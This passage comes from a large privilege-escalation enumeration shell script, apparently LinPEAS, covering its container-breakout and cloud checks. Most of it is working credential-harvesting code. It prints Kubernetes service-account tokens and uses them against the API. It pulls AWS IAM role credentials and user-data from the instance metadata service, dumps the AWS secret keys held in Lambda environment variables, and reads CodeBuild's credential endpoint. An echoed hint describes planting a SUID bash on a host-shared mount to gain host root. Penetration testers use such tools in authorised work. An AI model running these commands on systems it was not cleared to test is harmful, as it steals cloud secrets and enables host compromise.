"$NC 5024 if [ -f "/proc/sys/kernel/yama/ptrace_scope" ]; then 5025 (cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo "Not found") | sed -${E} "s,0,${SED_RED}," 5026 else 5027 echo "Not found" 5028 fi 5029 # Namespace checks. From inside a container we often cannot prove host namespace sharing directly, 5030 # so prefer raw namespace handles and practical indicators over misleading "host namespace = yes/no" guesses. 5031 print_3title "Namespaces & sharing indicators" "T1611" 5032 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/protections/namespaces/index.html" 5033 print_list "Current namespaces ............. "$NC 5034 ls -l /proc/self/ns/ 5035 if ps -e -o pid= >/dev/null 2>&1; then 5036 host_process_count="$(ps -e -o pid= 2>/dev/null | wc -l | tr -d ' ')" 5037 host_process_indicators="$(ps -eo comm= 2>/dev/null | grep -E '^(systemd|init|kthreadd|dockerd|containerd|kubelet|sshd|udevd|NetworkManager|dbus-daemon)$' | sort -u)" 5038 else 5039 host_process_count="$(ls -d /proc/[0-9]* 2>/dev/null | wc -l | tr -d ' ')" 5040 host_process_indicators="$(for proc_comm in /proc/[0-9]*/comm; do cat "$proc_comm" 2>/dev/null; done | grep -E '^(systemd|init|kthreadd|dockerd|containerd|kubelet|sshd|udevd|NetworkManager|dbus-daemon)$' | sort -u)" 5041 fi 5042 print_list "Processes visible .............. $host_process_count\n" | sed -${E} "s,^[^0-9]*([5-9][0-9]|[1-9][0-9]{2,}).*,${SED_RED_YELLOW}&," 5043 print_list "Host-like processes visible .... "$NC 5044 if [ "$host_process_indicators" ]; then 5045 printf "%s\n" "$host_process_indicators" | sed -${E} "s,.*,${SED_RED_YELLOW}&," 5046 else 5047 echo "No obvious host daemons" 5048 fi 5049 print_list "Network interfaces ............. "$NC 5050 if command -v ip >/dev/null 2>&1; then 5051 ip -o link show 2>/dev/null | awk -F': ' '{print $2}' 5052 else 5053 ls /sys/class/net 2>/dev/null 5054 fi 5055 print_list "Namespace inode summary ........ "$NC 5056 for ns in cgroup ipc mnt net pid time user uts; do 5057 if [ -L "/proc/self/ns/$ns" ]; then 5058 printf "%s -> %s\n" "$ns" "$(readlink "/proc/self/ns/$ns" 2>/dev/null)" 5059 fi 5060 done 5061 print_list "Looking and enumerating runtime sockets:\n"$NC 5062 enumerateDockerSockets 5063 # Additional breakout vectors 5064 print_3title "Writable kernel helper paths" "T1611" 5065 print_list "modprobe helper binary ......... $modprobe_binary\n" | sed -${E} "s,/.*,${SED_RED}," 5066 print_list "modprobe path writable ......... $modprobe_config_writable\n" | sed -${E} "s,Yes,${SED_RED}," 5067 print_list "panic_on_oom writable .......... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED}," 5068 print_list "suid_dumpable writable ......... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED}," 5069 print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED}," 5070 print_3title "Sensitive procfs/sysfs exposure" "T1611" 5071 print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5072 print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5073 print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5074 print_list "/proc/keys readable ............ $proc_keys_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5075 print_list "/proc/timer_list readable ...... $proc_timer_list_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5076 print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5077 print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5078 print_list "/proc/self/mem readable ........ $self_mem_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5079 print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5080 print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5081 print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED}," 5082 print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5083 print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED}," 5084 print_list "/sys/firmware readable ......... $sys_firmware_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5085 print_list "/sys/kernel/debug present ...... $debugfs_present\n" | sed -${E} "s,Yes,${SED_RED}," 5086 print_list "/sys/kernel/debug readable ..... $debugfs_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5087 print_list "/sys/class/thermal present ..... $thermal_present\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," 5088 print_list "/sys/class/thermal readable .... $thermal_readable\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," 5089 print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED}," 5090 print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED}," 5091 print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED}," 5092 print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED}," 5093 print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED}," 5094 # Additional kernel checks 5095 print_list "Kernel version .............. "$NC 5096 uname -a | sed -${E} "s,$(uname -r),${SED_RED}," 5097 print_list "Kernel modules ............. "$NC 5098 if command -v lsmod >/dev/null 2>&1; then 5099 lsmod | grep -E "overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio" | sed -${E} "s,overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio,${SED_RED},g" 5100 elif [ -r /proc/modules ]; then 5101 cat /proc/modules | grep -E "overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio" | sed -${E} "s,overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio,${SED_RED},g" 5102 else 5103 echo_not_found "lsmod and /proc/modules" 5104 fi 5105 # Additional container runtime checks 5106 print_list "Container runtime sockets .. "$NC 5107 (find /var/run /run -name "*.sock" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt|kubelet|buildkit|firecracker" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt|kubelet|buildkit|firecracker,${SED_RED},g" 5108 print_list "Container runtime configs .. "$NC 5109 (find /etc -name "*.conf" -o -name "*.json" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt|kubelet|buildkit|firecracker" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt|kubelet|buildkit|firecracker,${SED_RED},g" 5110 # Kubernetes specific checks 5111 if echo "$containerType" | grep -qi "kubernetes"; then 5112 print_3title "Kubernetes Specific Checks" "T1611" 5113 print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html" 5114 print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" 5115 print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" 5116 print_list "Kubernetes service account folder" | sed -${E} "s,.*,${SED_RED}," 5117 ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null 5118 print_list "Kubernetes env vars" | sed -${E} "s,.*,${SED_RED}," 5119 (env | set) | grep -Ei "kubernetes|kube" | grep -Ev "^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType=" 5120 print_list "Current sa user k8s permissions" | sed -${E} "s,.*,${SED_RED}," 5121 kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \ 5122 "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \ 5123 -X 'POST' -H 'Content-Type: application/json' \ 5124 --header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED}," 5125 # Additional Kubernetes checks 5126 print_list "Kubernetes API server ...... "$NC 5127 (curl -s -k https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/version 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN}," 5128 print_list "Kubernetes secrets ......... "$NC 5129 (kubectl get secrets 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN}," 5130 print_list "Kubernetes pods ............ "$NC 5131 (kubectl get pods 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN}," 5132 print_list "Kubernetes services ........ "$NC 5133 (kubectl get services 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN}," 5134 print_list "Kubernetes nodes ........... "$NC 5135 (kubectl get nodes 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN}," 5136 fi 5137 # Interesting files and mounts 5138 print_3title "Interesting Files & Mounts" "T1611" 5139 print_list "Interesting files mounted ........ "$NC 5140 (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g" 5141 print_list "Possible entrypoints ........... "$NC 5142 ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq 5143 echo "" 5144 fi 5145 5146 fi 5147 5148 if check_mitre_filter "T1611"; then 5149 containerCheck 5150 if [ "$inContainer" ]; then 5151 echo "" 5152 print_2title "Container - Writable bind mounts w/o nosuid (SUID persistence risk)" "T1611" 5153 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/privileged-containers.html#writable-bind-mounts" 5154 if [ -r /proc/self/mountinfo ]; then 5155 CT_RW_bind_mounts_matches=$(grep -E "(^| )bind( |$)" /proc/self/mountinfo 2>/dev/null | grep -E "(^|,)rw(,|$)" | grep -v "nosuid" || true) 5156 else 5157 CT_RW_bind_mounts_matches=$(mount -l 2>/dev/null | grep -E "bind" | grep -E "(^|,)rw(,|$)" | grep -v "nosuid" || true) 5158 fi 5159 if [ -z "$CT_RW_bind_mounts_matches" ]; then 5160 print_list "Writable bind mounts without nosuid ............ No" 5161 else 5162 print_list "Writable bind mounts without nosuid ............ Yes" | sed -${E} "s,Yes,${SED_RED}," 5163 echo "$CT_RW_bind_mounts_matches" | sed -${E} "s,/proc/self/mountinfo,${SED_GREEN}," 5164 echo "" 5165 if [ "$(id -u 2>/dev/null)" = "0" ]; then 5166 print_list "Note"; echo ": You are root inside a container and there are writable bind mounts without nosuid." | sed -${E} "s,.*,${SED_RED}," 5167 echo " If the path is shared with the host and executable there, you may plant a SUID binary (e.g., copy /bin/bash and chmod 6777)" 5168 echo " and execute it from the host to obtain root. Ensure proper authorization before testing." 5169 else 5170 print_list "Note"; echo ": Current user is not root; if you obtain container root, these mounts may enable host escalation via SUID planting." | sed -${E} "s,.*,${SED_RED}," 5171 fi 5172 fi 5173 echo "" 5174 fi 5175 5176 fi 5177 5178 fi 5179 5180 fi 5181 echo '' 5182 echo '' 5183 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi 5184 5185 if echo $CHECKS | grep -q cloud; then 5186 if check_mitre_filter "T1552.005,T1580"; then 5187 print_title "Cloud" 5188 check_gcp 5189 check_aws_ecs 5190 check_aws_ec2 5191 check_aws_lambda 5192 check_aws_codebuild 5193 check_do 5194 check_ibm_vm 5195 check_az_vm 5196 check_az_app 5197 check_az_automation_acc 5198 check_aliyun_ecs 5199 check_tencent_cvm 5200 if check_mitre_filter "T1580"; then 5201 printf "${YELLOW}Learn and practice cloud hacking techniques in ${BLUE}https://training.hacktricks.xyz\n"$NC 5202 echo "" 5203 print_list "GCP Virtual Machine? ................. $is_gcp_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5204 print_list "GCP Cloud Funtion? ................... $is_gcp_function\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5205 print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5206 print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5207 print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5208 print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5209 print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5210 print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5211 print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5212 print_list "Azure VM or Az metadata? ............. $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5213 print_list "Azure APP or IDENTITY_ENDPOINT? ...... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5214 print_list "Azure Automation Account? ............ $is_az_automation_acc\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5215 print_list "Aliyun ECS? .......................... $is_aliyun_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5216 print_list "Tencent CVM? ......................... $is_tencent_cvm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," 5217 echo "" 5218 5219 fi 5220 5221 if check_mitre_filter "T1552.005,T1580"; then 5222 if [ "$is_aws_ec2" = "Yes" ]; then 5223 print_2title "AWS EC2 Enumeration" "T1552.005,T1580" 5224 TOKEN="" 5225 TOKEN_HEADER="X-aws-ec2-metadata-token" 5226 TOKEN_TTL="X-aws-ec2-metadata-token-ttl-seconds: 21600" 5227 URL="http://169.254.169.254/latest/meta-data" 5228 aws_req="" 5229 if [ "$(command -v curl || echo -n '')" ]; then 5230 # Get token for IMDSv2 5231 TOKEN=$(curl -s -f -X PUT "http://169.254.169.254/latest/api/token" -H "$TOKEN_TTL" 2>/dev/null) 5232 aws_req="curl -s -f -L -H '$TOKEN_HEADER: $TOKEN'" 5233 elif [ "$(command -v wget || echo -n '')" ]; then 5234 # Get token for IMDSv2 5235 TOKEN=$(wget -q -O - --method=PUT --header="$TOKEN_TTL" "http://169.254.169.254/latest/api/token" 2>/dev/null) 5236 aws_req="wget -q -O - --header '$TOKEN_HEADER: $TOKEN'" 5237 else 5238 echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" 5239 fi 5240 if [ "$aws_req" ]; then 5241 printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo "" 5242 printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo "" 5243 printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo "" 5244 printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo "" 5245 printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo "" 5246 printf "region: "; eval $aws_req "$URL/placement/region"; echo "" 5247 echo "" 5248 print_3title "Account Info" "T1552.005,T1580" 5249 exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo "" 5250 echo "" 5251 print_3title "Network Info" "T1552.005,T1580" 5252 for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do 5253 echo "Mac: $mac" 5254 printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo "" 5255 printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo "" 5256 printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo "" 5257 echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo "" 5258 printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo "" 5259 echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo "" 5260 printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo "" 5261 echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo "" 5262 echo "" 5263 done 5264 echo "" 5265 print_3title "IAM Role" "T1552.005,T1580" 5266 exec_with_jq eval $aws_req "$URL/iam/info"; echo "" 5267 for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do 5268 echo "Role: $role" 5269 exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo "" 5270 echo "" 5271 done 5272 echo "" 5273 print_3title "User Data" "T1552.005,T1580" 5274 eval $aws_req "http://169.254.169.254/latest/user-data"; echo "" 5275 echo "" 5276 print_3title "EC2 Security Credentials" "T1552.005,T1580" 5277 exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo "" 5278 print_3title "SSM Runnig" "T1552.005,T1580" 5279 ps aux 2>/dev/null | grep "ssm-agent" | grep -Ev "grep|sed s,ssm-agent" | sed "s,ssm-agent,${SED_RED}," 5280 fi 5281 echo "" 5282 fi 5283 5284 fi 5285 5286 if check_mitre_filter "T1552.005,T1580"; then 5287 if [ "$is_aws_ecs" = "Yes" ]; then 5288 print_2title "AWS ECS Enumeration" "T1552.005,T1580" 5289 aws_ecs_req="" 5290 if [ "$(command -v curl || echo -n '')" ]; then 5291 aws_ecs_req='curl -s -f' 5292 elif [ "$(command -v wget || echo -n '')" ]; then 5293 aws_ecs_req='wget -q -O -' 5294 else 5295 echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" 5296 fi 5297 if [ "$aws_ecs_metadata_uri" ]; then 5298 print_3title "Container Info" "T1552.005,T1580" 5299 exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri" 5300 echo "" 5301 print_3title "Task Info" "T1552.005,T1580" 5302 exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task" 5303 echo "" 5304 else 5305 echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info" 5306 fi 5307 if [ "$aws_ecs_service_account_uri" ]; then 5308 print_3title "IAM Role" "T1552.005,T1580" 5309 exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri" 5310 echo "" 5311 else 5312 echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)" 5313 fi 5314 print_3title "ECS task metadata hints" "T1552.005,T1580" 5315 aws_exec_env=$(printenv AWS_EXECUTION_ENV 2>/dev/null) 5316 if [ "$aws_exec_env" ]; then 5317 printf "AWS_EXECUTION_ENV=%s\n" "$aws_exec_env" 5318 fi 5319 ecs_task_metadata="" 5320 if [ "$aws_ecs_metadata_uri" ]; then 5321 ecs_task_metadata=$(eval $aws_ecs_req "$aws_ecs_metadata_uri/task" 2>/dev/null) 5322 fi 5323 if [ "$ecs_task_metadata" ]; then 5324 launch_type=$(printf "%s" "$ecs_task_metadata" | grep -oE '"LaunchType":"[^"]+"' | head -n 1 | cut -d '"' -f4) 5325 if [ "$launch_type" ]; then 5326 printf "ECS LaunchType reported: %s\n" "$launch_type" 5327 fi 5328 network_modes=$(printf "%s" "$ecs_task_metadata" | grep -oE '"NetworkMode":"[^"]+"' | cut -d '"' -f4 | sort -u | tr '\n' ' ') 5329 if [ "$network_modes" ]; then 5330 printf "Reported NetworkMode(s): %s\n" "$network_modes" 5331 fi 5332 else 5333 echo "Unable to fetch task metadata (check ECS_CONTAINER_METADATA_URI)." 5334 fi 5335 echo "" 5336 print_3title "IMDS reachability from this task" "T1552.005,T1580" 5337 imds_token="" 5338 imds_roles="" 5339 imds_http_code="" 5340 imds_tool="" 5341 if command -v curl >/dev/null 2>&1; then 5342 imds_tool="curl" 5343 elif command -v wget >/dev/null 2>&1; then 5344 imds_tool="wget" 5345 fi 5346 if [ "$imds_tool" = "curl" ]; then 5347 imds_token=$(curl -s --connect-timeout 2 --max-time 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null) 5348 if [ "$imds_token" ]; then 5349 printf "[!] IMDSv2 token request succeeded (metadata reachable from this task).\n" 5350 imds_roles=$(curl -s --connect-timeout 2 --max-time 2 -H "X-aws-ec2-metadata-token: $imds_token" "http://169.254.169.254/latest/meta-data/iam/security-credentials/" 2>/dev/null | tr '\n' ' ') 5351 if [ "$imds_roles" ]; then 5352 printf " Instance profile role(s) exposed via IMDS: %s\n" "$imds_roles" 5353 first_role=$(printf "%s" "$imds_roles" | awk '{print $1}') 5354 if [ "$first_role" ]; then 5355 printf " Example: curl -H 'X-aws-ec2-metadata-token: <TOKEN>' http://169.254.169.254/latest/meta-data/iam/security-credentials/%s\n" "$first_role" 5356 fi 5357 else 5358 printf " No IAM role names returned (instance profile might be missing).\n" 5359 fi 5360 else 5361 imds_http_code=$(curl -s -o /dev/null -w "%{http_code}" --connect-timeout 2 --max-time 2 "http://169.254.169.254/latest/meta-data/" 2>/dev/null) 5362 case "$imds_http_code" in 5363 000|"") 5364 printf "[i] IMDS endpoint did not respond (likely blocked via hop-limit or host firewalling).\n" 5365 ;; 5366 401) 5367 printf "[i] IMDS requires v2 tokens but token requests are being blocked (bridge-mode tasks rely on this when hop limit = 1).\n" 5368 ;; 5369 *) 5370 printf "[i] IMDS GET returned HTTP %s (investigate host configuration).\n" "$imds_http_code" 5371 ;; 5372 esac 5373 fi 5374 elif [ "$imds_tool" = "wget" ]; then 5375 imds_token=$(wget -q -O - --timeout=2 --tries=1 --method=PUT --header="X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token" 2>/dev/null) 5376 if [ "$imds_token" ]; then 5377 printf "[!] IMDSv2 token request succeeded (metadata reachable from this task).\n" 5378 imds_roles=$(wget -q -O - --timeout=2 --tries=1 --header="X-aws-ec2-metadata-token: $imds_token" "http://169.254.169.254/latest/meta-data/iam/security-credentials/" 2>/dev/null | tr '\n' ' ') 5379 if [ "$imds_roles" ]; then 5380 printf " Instance profile role(s) exposed via IMDS: %s\n" "$imds_roles" 5381 else 5382 printf " No IAM role names returned (instance profile might be missing).\n" 5383 fi 5384 else 5385 wget --server-response -O /dev/null --timeout=2 --tries=1 "http://169.254.169.254/latest/meta-data/" 2>&1 | awk 'BEGIN{code=""} /^ HTTP/{code=$2} END{ if(code!="") { printf("[i] IMDS GET returned HTTP %s (token could not be retrieved).\n", code); } else { print "[i] IMDS endpoint did not respond (likely blocked)."; } }' 5386 fi 5387 else 5388 echo "Neither curl nor wget were found, I can't test IMDS reachability." 5389 fi 5390 echo "" 5391 print_3title "ECS agent IMDS settings" "T1552.005,T1580" 5392 if [ -r "/etc/ecs/ecs.config" ]; then 5393 ecs_block_line=$(grep -E "^ECS_AWSVPC_BLOCK_IMDS=" /etc/ecs/ecs.config 2>/dev/null | tail -n 1) 5394 ecs_host_line=$(grep -E "^ECS_ENABLE_TASK_IAM_ROLE_NETWORK_HOST=" /etc/ecs/ecs.config 2>/dev/null | tail -n 1) 5395 if [ "$ecs_block_line" ]; then 5396 printf "%s\n" "$ecs_block_line" 5397 if echo "$ecs_block_line" | grep -qi "=true"; then 5398 echo " -> awsvpc-mode tasks should be blocked from IMDS by the ECS agent." 5399 else 5400 echo " -> awsvpc-mode tasks can still reach IMDS (set this to true to block)." 5401 fi 5402 else 5403 echo "ECS_AWSVPC_BLOCK_IMDS not set (awsvpc tasks inherit host IMDS reachability)." 5404 fi 5405 if [ "$ecs_host_line" ]; then 5406 printf "%s\n" "$ecs_host_line" 5407 if echo "$ecs_host_line" | grep -qi "=false"; then 5408 echo " -> Host-network tasks lose IAM task roles but IMDS is blocked." 5409 else 5410 echo " -> Host-network tasks keep IAM task roles and retain IMDS access." 5411 fi 5412 else 5413 echo "ECS_ENABLE_TASK_IAM_ROLE_NETWORK_HOST not set (defaults keep IMDS reachable for host-mode tasks)." 5414 fi 5415 else 5416 echo "Cannot read /etc/ecs/ecs.config (file missing or permissions denied)." 5417 fi 5418 echo "" 5419 print_3title "DOCKER-USER IMDS filtering" "T1552.005,T1580" 5420 iptables_cmd="" 5421 if command -v iptables >/dev/null 2>&1; then 5422 iptables_cmd=$(command -v iptables) 5423 elif command -v iptables-nft >/dev/null 2>&1; then 5424 iptables_cmd=$(command -v iptables-nft) 5425 fi 5426 if [ "$iptables_cmd" ]; then 5427 docker_rules=$($iptables_cmd -S DOCKER-USER 2>/dev/null) 5428 if [ $? -eq 0 ]; then 5429 if [ "$docker_rules" ]; then 5430 echo "$docker_rules" 5431 else 5432 echo "(DOCKER-USER chain exists but no rules were found)" 5433 fi 5434 if echo "$docker_rules" | grep -q "169\\.254\\.169\\.254"; then 5435 echo " -> IMDS traffic is explicitly filtered before Docker NAT." 5436 else 5437 echo " -> No DOCKER-USER rule drops 169.254.169.254 traffic (bridge tasks rely on hop limit or host firewalling)." 5438 fi 5439 else 5440 echo "Unable to read DOCKER-USER chain (missing chain or insufficient permissions)." 5441 fi 5442 else 5443 echo "iptables binary not found; cannot inspect DOCKER-USER chain." 5444 fi 5445 echo "" 5446 fi 5447 5448 fi 5449 5450 if check_mitre_filter "T1552.005,T1580"; then 5451 if [ "$is_aws_lambda" = "Yes" ]; then 5452 print_2title "AWS Lambda Enumeration" "T1552.005,T1580" 5453 printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME 5454 printf "Region: "; env | grep AWS_REGION 5455 printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY 5456 printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID 5457 printf "Session token: "; env | grep AWS_SESSION_TOKEN 5458 printf "Security token: "; env | grep AWS_SECURITY_TOKEN 5459 printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API 5460 printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next") 5461 echo "" 5462 fi 5463 5464 fi 5465 5466 if check_mitre_filter "T1552.005,T1580"; then 5467 if [ "$is_aws_codebuild" = "Yes" ]; then 5468 print_2title "AWS Codebuild Enumeration" "T1552.005,T1580" 5469 aws_req="" 5470 if [ "$(command -v curl || echo -n '')" ]; then 5471 aws_req="curl -s -f" 5472 elif [ "$(command -v wget || echo -n '')" ]; then 5473 aws_req="wget -q -O -" 5474 else 5475 echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" 5476 echo "The addresses are in /codebuild/output/tmp/env.sh" 5477 fi 5478 if [ "$aws_req" ]; then 5479 print_3title "Credentials" "T1552.005,T1580" 5480 CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2) 5481 URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig 5482 exec_with_jq eval $aws_req "$URL_CREDS"; echo "" 5483 print_3title "Container Info" "T1552.005,T1580" 5484 METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2) 5485 exec_with_jq eval $aws_req "$METADATA_URL"; echo "" 5486 fi 5487 echo "" 5488 fi 5489 5490 fi 5491 5492 if check_mitre_filter "T1552.005,T1580"; then 5493 if [ "$is_gcp_function" = "Yes" ]; then 5494 gcp_req="" 5495 if [ "$(command -v curl)" ]; then 5496 gcp_req='curl -s -f -L -H "Metadata-Flavor: Google"' 5497 elif [ "$(command -v wget)" ]; then 5498 gcp_req='wget -q -O - --header "Metadata-Flavor: Google"' 5499 else 5500 echo "Neither curl nor wget were found, I can't enumerate the 